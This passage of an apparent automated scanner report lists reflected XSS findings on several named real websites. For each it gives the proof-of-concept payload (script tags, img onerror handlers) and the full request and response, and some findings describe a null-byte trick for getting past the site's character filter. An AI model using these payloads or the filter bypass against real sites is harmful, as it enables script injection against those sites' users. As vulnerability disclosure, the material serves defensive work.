HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:59 GMT Date: Sun, 27 Feb 2011 16:44:59 GMT Connection: close Content-Length: 3594
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)</script>98b62b0333a was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=283806569b<script>alert(1)</script>98b62b0333a&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:00 GMT Date: Sun, 27 Feb 2011 16:45:00 GMT Connection: close Content-Length: 3594
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ed016<script>alert(1)</script>37dd9a94977 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=ed016<script>alert(1)</script>37dd9a94977&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:01 GMT Date: Sun, 27 Feb 2011 16:45:01 GMT Connection: close Content-Length: 3594
The value of the BnId request parameter is copied into the HTML document as plain text between tags. The payload d23ea<img%20src%3da%20onerror%3dalert(1)>11242cb47aa was submitted in the BnId parameter. This input was echoed as d23ea<img src=a onerror=alert(1)>11242cb47aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=d23ea<img%20src%3da%20onerror%3dalert(1)>11242cb47aa HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:45:07 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56347
The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 94f39<img%20src%3da%20onerror%3dalert(1)>6a768a93c3 was submitted in the REST URL parameter 10. This input was echoed as 94f39<img src=a onerror=alert(1)>6a768a93c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink94f39<img%20src%3da%20onerror%3dalert(1)>6a768a93c3/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:26 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56525
The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload 5bcaa<img%20src%3da%20onerror%3dalert(1)>df3967d3b03 was submitted in the REST URL parameter 11. This input was echoed as 5bcaa<img src=a onerror=alert(1)>df3967d3b03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/51135bcaa<img%20src%3da%20onerror%3dalert(1)>df3967d3b03/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:31 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 69f84<img%20src%3da%20onerror%3dalert(1)>faa1bc042a8 was submitted in the REST URL parameter 12. This input was echoed as 69f84<img src=a onerror=alert(1)>faa1bc042a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/183831369f84<img%20src%3da%20onerror%3dalert(1)>faa1bc042a8/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:38 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 13 is copied into the HTML document as plain text between tags. The payload 7ba35<img%20src%3da%20onerror%3dalert(1)>b5fe03ca28a was submitted in the REST URL parameter 13. This input was echoed as 7ba35<img src=a onerror=alert(1)>b5fe03ca28a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/07ba35<img%20src%3da%20onerror%3dalert(1)>b5fe03ca28a/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:45 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 9ec74<img%20src%3da%20onerror%3dalert(1)>e70d7034ce2 was submitted in the REST URL parameter 14. This input was echoed as 9ec74<img src=a onerror=alert(1)>e70d7034ce2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/5299ec74<img%20src%3da%20onerror%3dalert(1)>e70d7034ce2/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:52 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 15 is copied into the HTML document as plain text between tags. The payload 16922<img%20src%3da%20onerror%3dalert(1)>f636662a426 was submitted in the REST URL parameter 15. This input was echoed as 16922<img src=a onerror=alert(1)>f636662a426 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId16922<img%20src%3da%20onerror%3dalert(1)>f636662a426=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:59 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 467b6<img%20src%3da%20onerror%3dalert(1)>6c593df3db8 was submitted in the REST URL parameter 4. This input was echoed as 467b6<img src=a onerror=alert(1)>6c593df3db8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif467b6<img%20src%3da%20onerror%3dalert(1)>6c593df3db8/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:45:48 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 18572
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e8572<img%20src%3da%20onerror%3dalert(1)>efc59e097e0 was submitted in the REST URL parameter 5. This input was echoed as e8572<img src=a onerror=alert(1)>efc59e097e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aole8572<img%20src%3da%20onerror%3dalert(1)>efc59e097e0/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:45:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56534
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1abe0<img%20src%3da%20onerror%3dalert(1)>6a7add9aecc was submitted in the REST URL parameter 6. This input was echoed as 1abe0<img src=a onerror=alert(1)>6a7add9aecc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id1abe0<img%20src%3da%20onerror%3dalert(1)>6a7add9aecc/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:02 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3ffef<img%20src%3da%20onerror%3dalert(1)>0560571b3eb was submitted in the REST URL parameter 7. This input was echoed as 3ffef<img src=a onerror=alert(1)>0560571b3eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e4345753ffef<img%20src%3da%20onerror%3dalert(1)>0560571b3eb/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56534
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 33b85<img%20src%3da%20onerror%3dalert(1)>c54be653d5e was submitted in the REST URL parameter 8. This input was echoed as 33b85<img src=a onerror=alert(1)>c54be653d5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http:33b85<img%20src%3da%20onerror%3dalert(1)>c54be653d5e//at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:16 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 37922<img%20src%3da%20onerror%3dalert(1)>f402d1ff062 was submitted in the REST URL parameter 9. This input was echoed as 37922<img src=a onerror=alert(1)>f402d1ff062 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com37922<img%20src%3da%20onerror%3dalert(1)>f402d1ff062/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:20 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
3.33. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6855a--><script>alert(1)</script>bc4102ec8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1 HTTP/1.1 Host: cds.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loo ...[SNIP]... elimiter="&" parametername="goto" currenturl="https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1&ProductUUID=pGqJ_hCwj_AAAAEtB8oADqmS&ProductID=pGqJ_hCwj_AAAAEtB8oADqmS&Origin=ViewProductDetail-Start" --> ...[SNIP]...
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b192"><script>alert(1)</script>32cca89645832eced was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0070e78<a>271d7883f11 was submitted in the REST URL parameter 1. This input was echoed as 70e78<a>271d7883f11 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%0070e78<a>271d7883f11/2006/03/faster HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:07 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dcea7"><script>alert(1)</script>512fbcc591d was submitted in the REST URL parameter 1. This input was echoed as dcea7"><script>alert(1)</script>512fbcc591d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
